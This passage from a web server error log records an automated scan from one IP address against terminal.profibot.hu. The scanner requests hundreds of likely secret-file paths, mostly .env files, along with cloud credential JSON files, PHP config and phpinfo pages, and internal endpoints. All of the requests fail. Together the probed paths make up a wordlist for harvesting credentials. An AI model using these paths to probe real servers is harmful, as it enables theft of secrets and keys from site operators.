client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env/example/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env/template/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /environments/local/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /environments/production/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /envs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /error.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /error/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /errors/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /example/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /example02-golang-package/import-underscore/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /example27-how-to-load-env/sample01/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /example27-how-to-load-env/sample02/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/01-simple-model/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/02-complex-example/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/03-one-to-many-relationship/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/04-many-to-many-relationship/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/05-migrations/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/06-base-service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/07-feature-flags/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/08-performance/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/09-production/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/10-subscriptions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/11-transactions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/drupal-separate-services/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/react-dashboard/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/sdl-first/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/sdl-first/prisma/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/vue-dashboard/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/with-cookie-auth-fauna/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/with-dotenv/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/with-firebase-authentication-serverless/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/with-react-relay-network-modern/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/with-relay-modern/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /examples/with-universal-configuration-build-time/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /exapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Exercise.Frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Exercise.Frontend/train/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /export/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fastlane/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /favicons/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /favs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /FE/huey/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fedex/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:21 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fhir-api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /files/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fileserver/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /films/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Final_Project/Airflow_Dag/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Final_Project/kafka_twitter/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Final_Project/StartingFile/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /finalVersion/lcomernbootcamp/projbackend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /firebase.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /first-network/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /FIRST_CONFIG/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fisdom/fisdom/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fixtures/blocks/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fixtures/fiber-debugger/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fixtures/flight/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fixtures/kitchensink/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /flask/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /flask_test_uploads/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fm/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /font-icons/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /fonts/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /framework/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /front-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /front-empathy/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /front-end/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /front/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /front/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /frontend/momentum-fe/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /frontend/react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /frontend/vue/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /frontend/web/debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /frontendfinaltest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ftp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:22 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ftpmaster/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /functions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /gcloud.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /gcp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /gists/cache HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /gists/laravel HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /gists/pusher HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /github-connect/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /google/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /graphiql/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /graphql/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /grems-api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /grems-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Hash/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /hasura/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /hc/restricted HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Helmetjs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /hgs-static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /higlass-website/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /home/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /horde/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /hotpot-app-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /htdocs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /html/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /http/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /httpboot/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /httpdocs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /HUNIV_migration/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /i.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /icon/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /icons/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ikiwiki/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /image_data/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Imagebord/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:23 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /images/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /img/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /in.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /inc.config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /includes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /includes/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /index.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /index1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /inf.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /infophp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /infos.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ini.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /install/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /InstantCV/server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /internal-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /internal/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /internal/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /isadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /items/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /javascript/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /jenkins/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /jo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /joomla/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js-plugin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET 